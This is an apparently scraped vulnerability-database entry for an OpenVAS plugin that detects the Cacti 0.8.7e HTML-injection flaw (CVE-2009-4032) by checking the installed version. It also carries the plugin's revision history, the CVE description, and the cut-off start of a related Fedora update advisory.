ID OPENVAS:1361412562310100361 Type openvas Reporter This script is Copyright (C) 2009 Greenbone Networks GmbH Modified 2019-03-07T00:00:00
Description
Cacti is prone to multiple HTML-injection vulnerabilities because it fails to
properly sanitize user-supplied input before using it in dynamically generated content.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: cacti_37109.nasl 14031 2019-03-07 10:47:29Z cfischer $
#
# Cacti Multiple HTML Injection Vulnerabilities
#
# Authors:
# Michael Meyer
#
# Copyright:
# Copyright (c) 2009 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
CPE = "cpe:/a:cacti:cacti";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.100361");
script_version("$Revision: 14031 $");
script_tag(name:"last_modification", value:"$Date: 2019-03-07 11:47:29 +0100 (Thu, 07 Mar 2019) $");
script_tag(name:"creation_date", value:"2009-11-25 11:49:08 +0100 (Wed, 25 Nov 2009)");
script_cve_id("CVE-2009-4032");
script_bugtraq_id(37109);
script_tag(name:"cvss_base", value:"4.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
script_tag(name:"solution_type", value:"VendorFix");
script_name("Cacti Multiple HTML Injection Vulnerabilities");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/37109");
script_xref(name:"URL", value:"http://cacti.net/");
script_xref(name:"URL", value:"http://docs.cacti.net/#cross-site_scripting_fixes");
script_category(ACT_GATHER_INFO);
script_tag(name:"qod_type", value:"remote_banner");
script_family("Web application abuses");
script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
script_dependencies("cacti_detect.nasl");
script_mandatory_keys("cacti/installed");
script_tag(name:"solution", value:"A patch is available. Please see the references for details.");
script_tag(name:"summary", value:"Cacti is prone to multiple HTML-injection vulnerabilities because it fails to
properly sanitize user-supplied input before using it in dynamically generated content.");
script_tag(name:"impact", value:"Attacker-supplied HTML and script code would run in the context of the affected
browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the
site is rendered to the user. Other attacks are also possible.");
script_tag(name:"affected", value:"Cacti 0.8.7e is vulnerable. Other versions may be affected as well.");
exit(0);
}
include("host_details.inc");
include("version_func.inc");
if (!port = get_app_port(cpe: CPE))
exit(0);
if (!vers = get_app_version(cpe: CPE, port: port))
exit(0);
if (version_is_equal(version: vers, test_version: "0.8.7e")) {
report = report_fixed_ver(installed_version: vers, fixed_version: "See references");
security_message(port: port, data: report);
exit(0);
}
exit(99);
{"id": "OPENVAS:1361412562310100361", "bulletinFamily": "scanner", "title": "Cacti Multiple HTML Injection Vulnerabilities", "description": "Cacti is prone to multiple HTML-injection vulnerabilities because it fails to\n properly sanitize user-supplied input before using it in dynamically generated content.", "published": "2009-11-25T00:00:00", "modified": "2019-03-07T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100361", "reporter": "This script is Copyright (C) 2009 Greenbone Networks GmbH", "references": ["http://cacti.net/", "http://docs.cacti.net/#cross-site_scripting_fixes", "http://www.securityfocus.com/bid/37109"], "cvelist": ["CVE-2009-4032"], "type": "openvas", "lastseen": "2019-03-07T20:18:58", "history": [{"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2009-4032"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "Cacti is prone to multiple HTML-injection vulnerabilities because it fails to\nproperly sanitize user-supplied input before using it in dynamically generated content.\n\nAttacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the\nattacker to steal cookie-based authentication credentials or to control how the site is rendered to the user.\nOther attacks are also possible.\n\nCacti 0.8.7e is vulnerable; other versions may be affected as well.", "edition": 3, "enchantments": {"dependencies": {"modified": "2018-09-02T00:05:57", "references": [{"idList": ["JVN:09758120"], "type": "jvn"}, {"idList": ["EDB-ID:10234", "EDB-ID:33374"], "type": "exploitdb"}, {"idList": ["SECURITYVULNS:DOC:22951", "SECURITYVULNS:DOC:22850"], "type": "securityvulns"}, {"idList": ["FEDORA_2009-12560.NASL", "FREEBSD_PKG_04104985D84611DE84E400215AF774F0.NASL", "DEBIAN_DSA-1954.NASL", "FEDORA_2009-12575.NASL", "SUSE_11_0_CACTI-091202.NASL"], "type": "nessus"}, {"idList": ["DEBIAN:DSA-1954-1:7A11F"], "type": "debian"}, {"idList": ["OPENVAS:136141256231066584", "OPENVAS:66300", "OPENVAS:1361412562310831138", "OPENVAS:136141256231066300", "OPENVAS:1361412562310861611", "OPENVAS:100361", "OPENVAS:136141256231066592", "OPENVAS:66592", "OPENVAS:66584", "OPENVAS:861611"], "type": "openvas"}, {"idList": ["CVE-2009-4032"], "type": "cve"}, {"idList": ["PACKETSTORM:83264"], "type": "packetstorm"}, {"idList": ["04104985-D846-11DE-84E4-00215AF774F0"], "type": "freebsd"}, {"idList": ["SSV:15105", "SSV:18336"], "type": "seebug"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "9ce089900ba94d4e864a235d230ed653333edc805892b8c20a4527e786c83426", "hashmap": [{"hash": "32449658bfe7af4c84f88efc4f6cd90c", "key": "title"}, {"hash": "7802a0c565901f489a8f5f8225f8127d", "key": "modified"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "1f1a9727eba57e5ae91375d4dd8756ed", "key": "references"}, {"hash": "845ae7cd7395f6073e1e5e161fc806d4", "key": "href"}, {"hash": "a2a5904218b16c94aeebec7041709bcd", "key": "reporter"}, {"hash": "0be6e1ff4fa873d4c57d77925c112a4a", "key": "cvelist"}, {"hash": "a8912d1128df515701be10880c2df998", "key": "sourceData"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "20d0616a6a0344bf19ca675de8c30139", "key": "description"}, {"hash": "83e24e49b236d288a342c976caf17810", "key": "pluginID"}, {"hash": "13306809b28ff041ef9450613f0bf834", "key": "published"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100361", "id": "OPENVAS:1361412562310100361", "lastseen": "2018-09-02T00:05:57", "modified": "2018-02-06T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310100361", "published": "2009-11-25T00:00:00", "references": ["http://cacti.net/", "http://docs.cacti.net/#cross-site_scripting_fixes", "http://www.securityfocus.com/bid/37109"], "reporter": "This script is Copyright (C) 2009 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: cacti_37109.nasl 8674 2018-02-06 02:56:44Z ckuersteiner $\n#\n# Cacti Multiple HTML Injection Vulnerabilities\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cacti:cacti\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100361\");\n script_version(\"$Revision: 8674 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-02-06 03:56:44 +0100 (Tue, 06 Feb 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-25 11:49:08 +0100 (Wed, 25 Nov 2009)\");\n script_cve_id(\"CVE-2009-4032\");\n script_bugtraq_id(37109);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_name(\"Cacti Multiple HTML Injection Vulnerabilities\");\n\n script_xref(name: \"URL\", value: \"http://www.securityfocus.com/bid/37109\");\n script_xref(name: \"URL\", value: \"http://cacti.net/\");\n script_xref(name: \"URL\", value: \"http://docs.cacti.net/#cross-site_scripting_fixes\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"cacti_detect.nasl\");\n script_mandatory_keys(\"cacti/installed\");\n\n script_tag(name: \"solution\", value: \"A patch is available. Please see the references for details.\");\n\n script_tag(name: \"summary\", value: \"Cacti is prone to multiple HTML-injection vulnerabilities because it fails to\nproperly sanitize user-supplied input before using it in dynamically generated content.\n\nAttacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the\nattacker to steal cookie-based authentication credentials or to control how the site is rendered to the user.\nOther attacks are also possible.\n\nCacti 0.8.7e is vulnerable; other versions may be affected as well.\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!vers = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_equal(version: vers, test_version: \"0.8.7e\")) {\n security_message(port: port);\n exit(0);\n} \n\nexit(0);\n", "title": "Cacti Multiple HTML Injection Vulnerabilities", "type": "openvas", "viewCount": 0}, "differentElements": ["description", "modified", "sourceData"], "edition": 3, "lastseen": "2018-09-02T00:05:57"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2009-4032"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Cacti is prone to multiple HTML-injection vulnerabilities because it fails to\nproperly sanitize user-supplied input before using it in dynamically generated content.\n\nAttacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the\nattacker to steal cookie-based authentication credentials or to control how the site is rendered to the user.\nOther attacks are also possible.\n\nCacti 0.8.7e is vulnerable; other versions may be affected as well.", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "18cf334a47869a48033a20d350811aae531722b43ef3abaf0d213360e354c853", "hashmap": [{"hash": "32449658bfe7af4c84f88efc4f6cd90c", "key": "title"}, {"hash": "7802a0c565901f489a8f5f8225f8127d", "key": "modified"}, {"hash": "1f1a9727eba57e5ae91375d4dd8756ed", "key": "references"}, {"hash": "845ae7cd7395f6073e1e5e161fc806d4", "key": "href"}, {"hash": "a2a5904218b16c94aeebec7041709bcd", "key": "reporter"}, {"hash": "0be6e1ff4fa873d4c57d77925c112a4a", "key": "cvelist"}, {"hash": "a8912d1128df515701be10880c2df998", "key": "sourceData"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "20d0616a6a0344bf19ca675de8c30139", "key": "description"}, {"hash": "83e24e49b236d288a342c976caf17810", "key": "pluginID"}, {"hash": "13306809b28ff041ef9450613f0bf834", "key": "published"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100361", "id": "OPENVAS:1361412562310100361", "lastseen": "2018-08-30T19:28:16", "modified": "2018-02-06T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310100361", "published": "2009-11-25T00:00:00", "references": ["http://cacti.net/", "http://docs.cacti.net/#cross-site_scripting_fixes", "http://www.securityfocus.com/bid/37109"], "reporter": "This script is Copyright (C) 2009 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: cacti_37109.nasl 8674 2018-02-06 02:56:44Z ckuersteiner $\n#\n# Cacti Multiple HTML Injection Vulnerabilities\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cacti:cacti\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100361\");\n script_version(\"$Revision: 8674 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-02-06 03:56:44 +0100 (Tue, 06 Feb 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-25 11:49:08 +0100 (Wed, 25 Nov 2009)\");\n script_cve_id(\"CVE-2009-4032\");\n script_bugtraq_id(37109);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_name(\"Cacti Multiple HTML Injection Vulnerabilities\");\n\n script_xref(name: \"URL\", value: \"http://www.securityfocus.com/bid/37109\");\n script_xref(name: \"URL\", value: \"http://cacti.net/\");\n script_xref(name: \"URL\", value: \"http://docs.cacti.net/#cross-site_scripting_fixes\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"cacti_detect.nasl\");\n script_mandatory_keys(\"cacti/installed\");\n\n script_tag(name: \"solution\", value: \"A patch is available. Please see the references for details.\");\n\n script_tag(name: \"summary\", value: \"Cacti is prone to multiple HTML-injection vulnerabilities because it fails to\nproperly sanitize user-supplied input before using it in dynamically generated content.\n\nAttacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the\nattacker to steal cookie-based authentication credentials or to control how the site is rendered to the user.\nOther attacks are also possible.\n\nCacti 0.8.7e is vulnerable; other versions may be affected as well.\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!vers = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_equal(version: vers, test_version: \"0.8.7e\")) {\n security_message(port: port);\n exit(0);\n} \n\nexit(0);\n", "title": "Cacti Multiple HTML Injection Vulnerabilities", "type": "openvas", "viewCount": 0}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2018-08-30T19:28:16"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2009-4032"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "Cacti is prone to multiple HTML-injection vulnerabilities because it fails to\nproperly sanitize user-supplied input before using it in dynamically generated content.\n\nAttacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the\nattacker to steal cookie-based authentication credentials or to control how the site is rendered to the user.\nOther attacks are also possible.\n\nCacti 0.8.7e is vulnerable; other versions may be affected as well.", "edition": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "9ce089900ba94d4e864a235d230ed653333edc805892b8c20a4527e786c83426", "hashmap": [{"hash": "32449658bfe7af4c84f88efc4f6cd90c", "key": "title"}, {"hash": "7802a0c565901f489a8f5f8225f8127d", "key": "modified"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "1f1a9727eba57e5ae91375d4dd8756ed", "key": "references"}, {"hash": "845ae7cd7395f6073e1e5e161fc806d4", "key": "href"}, {"hash": "a2a5904218b16c94aeebec7041709bcd", "key": "reporter"}, {"hash": "0be6e1ff4fa873d4c57d77925c112a4a", "key": "cvelist"}, {"hash": "a8912d1128df515701be10880c2df998", "key": "sourceData"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "20d0616a6a0344bf19ca675de8c30139", "key": "description"}, {"hash": "83e24e49b236d288a342c976caf17810", "key": "pluginID"}, {"hash": "13306809b28ff041ef9450613f0bf834", "key": "published"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100361", "id": "OPENVAS:1361412562310100361", "lastseen": "2018-02-06T13:18:04", "modified": "2018-02-06T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310100361", "published": "2009-11-25T00:00:00", "references": ["http://cacti.net/", "http://docs.cacti.net/#cross-site_scripting_fixes", "http://www.securityfocus.com/bid/37109"], "reporter": "This script is Copyright (C) 2009 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: cacti_37109.nasl 8674 2018-02-06 02:56:44Z ckuersteiner $\n#\n# Cacti Multiple HTML Injection Vulnerabilities\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cacti:cacti\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100361\");\n script_version(\"$Revision: 8674 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-02-06 03:56:44 +0100 (Tue, 06 Feb 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-25 11:49:08 +0100 (Wed, 25 Nov 2009)\");\n script_cve_id(\"CVE-2009-4032\");\n script_bugtraq_id(37109);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_name(\"Cacti Multiple HTML Injection Vulnerabilities\");\n\n script_xref(name: \"URL\", value: \"http://www.securityfocus.com/bid/37109\");\n script_xref(name: \"URL\", value: \"http://cacti.net/\");\n script_xref(name: \"URL\", value: \"http://docs.cacti.net/#cross-site_scripting_fixes\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"cacti_detect.nasl\");\n script_mandatory_keys(\"cacti/installed\");\n\n script_tag(name: \"solution\", value: \"A patch is available. Please see the references for details.\");\n\n script_tag(name: \"summary\", value: \"Cacti is prone to multiple HTML-injection vulnerabilities because it fails to\nproperly sanitize user-supplied input before using it in dynamically generated content.\n\nAttacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the\nattacker to steal cookie-based authentication credentials or to control how the site is rendered to the user.\nOther attacks are also possible.\n\nCacti 0.8.7e is vulnerable; other versions may be affected as well.\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!vers = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_equal(version: vers, test_version: \"0.8.7e\")) {\n security_message(port: port);\n exit(0);\n} \n\nexit(0);\n", "title": "Cacti Multiple HTML Injection Vulnerabilities", "type": "openvas", "viewCount": 0}, "differentElements": ["cvss"], "edition": 1, "lastseen": "2018-02-06T13:18:04"}], "edition": 4, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "0be6e1ff4fa873d4c57d77925c112a4a"}, {"key": "cvss", "hash": "6e9bdd2021503689a2ad9254c9cdf2b3"}, {"key": "description", "hash": "a97a3aa76dd809229589d36c1102135a"}, {"key": "href", "hash": "845ae7cd7395f6073e1e5e161fc806d4"}, {"key": "modified", "hash": "239e98079e29ae495f96882251231d51"}, {"key": "naslFamily", "hash": "55199d25018fbdb9b50e6b64d444c3a4"}, {"key": "pluginID", "hash": "83e24e49b236d288a342c976caf17810"}, {"key": "published", "hash": "13306809b28ff041ef9450613f0bf834"}, {"key": "references", "hash": "1f1a9727eba57e5ae91375d4dd8756ed"}, {"key": "reporter", "hash": "a2a5904218b16c94aeebec7041709bcd"}, {"key": "sourceData", "hash": "4671876a5b3a1d8beabf7c805d0d951d"}, {"key": "title", "hash": "32449658bfe7af4c84f88efc4f6cd90c"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "hash": "04699f324c9a0e535988a3cdb046da29550ad0a10b9187c0d0f88fec9ac57ea7", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-4032"]}, {"type": "openvas", "idList": ["OPENVAS:100361", "OPENVAS:136141256231066300", "OPENVAS:861611", "OPENVAS:1361412562310861611", "OPENVAS:66584", "OPENVAS:66300", "OPENVAS:136141256231066584", "OPENVAS:136141256231066592", "OPENVAS:66592", "OPENVAS:1361412562310831138"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22850", "SECURITYVULNS:DOC:22951"]}, {"type": "jvn", "idList": ["JVN:09758120"]}, {"type": "freebsd", "idList": ["04104985-D846-11DE-84E4-00215AF774F0"]}, {"type": "seebug", "idList": ["SSV:18336", "SSV:15105"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83264"]}, {"type": "nessus", "idList": ["FEDORA_2009-12560.NASL", "FEDORA_2009-12575.NASL", "FREEBSD_PKG_04104985D84611DE84E400215AF774F0.NASL", "SUSE_11_0_CACTI-091202.NASL", "DEBIAN_DSA-1954.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:33374", "EDB-ID:10234"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1954-1:7A11F"]}], "modified": "2019-03-07T20:18:58"}, "score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: cacti_37109.nasl 14031 2019-03-07 10:47:29Z cfischer $\n#\n# Cacti Multiple HTML Injection Vulnerabilities\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cacti:cacti\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100361\");\n script_version(\"$Revision: 14031 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-07 11:47:29 +0100 (Thu, 07 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-25 11:49:08 +0100 (Wed, 25 Nov 2009)\");\n script_cve_id(\"CVE-2009-4032\");\n script_bugtraq_id(37109);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Cacti Multiple HTML Injection Vulnerabilities\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/37109\");\n script_xref(name:\"URL\", value:\"http://cacti.net/\");\n script_xref(name:\"URL\", value:\"http://docs.cacti.net/#cross-site_scripting_fixes\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"cacti_detect.nasl\");\n script_mandatory_keys(\"cacti/installed\");\n\n script_tag(name:\"solution\", value:\"A patch is available. Please see the references for details.\");\n\n script_tag(name:\"summary\", value:\"Cacti is prone to multiple HTML-injection vulnerabilities because it fails to\n properly sanitize user-supplied input before using it in dynamically generated content.\");\n\n script_tag(name:\"impact\", value:\"Attacker-supplied HTML and script code would run in the context of the affected\n browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the\n site is rendered to the user. Other attacks are also possible.\");\n\n script_tag(name:\"affected\", value:\"Cacti 0.8.7e is vulnerable. Other versions may be affected as well.\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!vers = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_equal(version: vers, test_version: \"0.8.7e\")) {\n report = report_fixed_ver(installed_version: vers, fixed_version: \"See references\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);", "naslFamily": "Web application abuses", "pluginID": "1361412562310100361", "scheme": null}
{"cve": [{"lastseen": "2018-10-11T11:33:54", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in Cacti 0.8.7e allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) graph.php, (2) include/top_graph_header.php, (3) lib/html_form.php, and (4) lib/timespan_settings.php, as demonstrated by the (a) graph_end or (b) graph_start parameters to graph.php; (c) the date1 parameter in a tree action to graph_view.php; and the (d) page_refresh and (e) default_dual_pane_width parameters to graph_settings.php.", "modified": "2018-10-10T15:48:10", "published": "2009-11-29T08:07:34", "id": "CVE-2009-4032", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4032", "title": "CVE-2009-4032", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "openvas": [{"lastseen": "2017-07-25T10:56:55", "bulletinFamily": "scanner", "description": "The remote host is missing an update to cacti\nannounced via advisory FEDORA-2009-12575.", "modified": "2017-07-10T00:00:00", "published": "2009-12-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=66584", "id": "OPENVAS:66584", "title": "Fedora Core 11 FEDORA-2009-12575 (cacti)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_12575.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-12575 (cacti)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nThis fix contains several official patches from cacti:\n Command Line Add Graphs Syntax\n SNMP Invalid Responses \n Template Import/Export Duplication\n Cross-Site Scripting Fixes\nhttp://www.cacti.net/download_patches.php\n\nChangeLog:\n\n* Tue Dec 1 2009 Mike McGrath - 0.8.7e-3\n- Pulling in some official patches\n- #541279\n- #541962\n* Sun Aug 16 2009 Mike McGrath - 0.8.7e-1\n- Upstream released new version\n* Fri Jul 24 2009 Fedora Release Engineering - 0.8.7d-4\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_12_Mass_Rebuild\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update cacti' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-12575\";\ntag_summary = \"The remote host is missing an update to cacti\nannounced via advisory 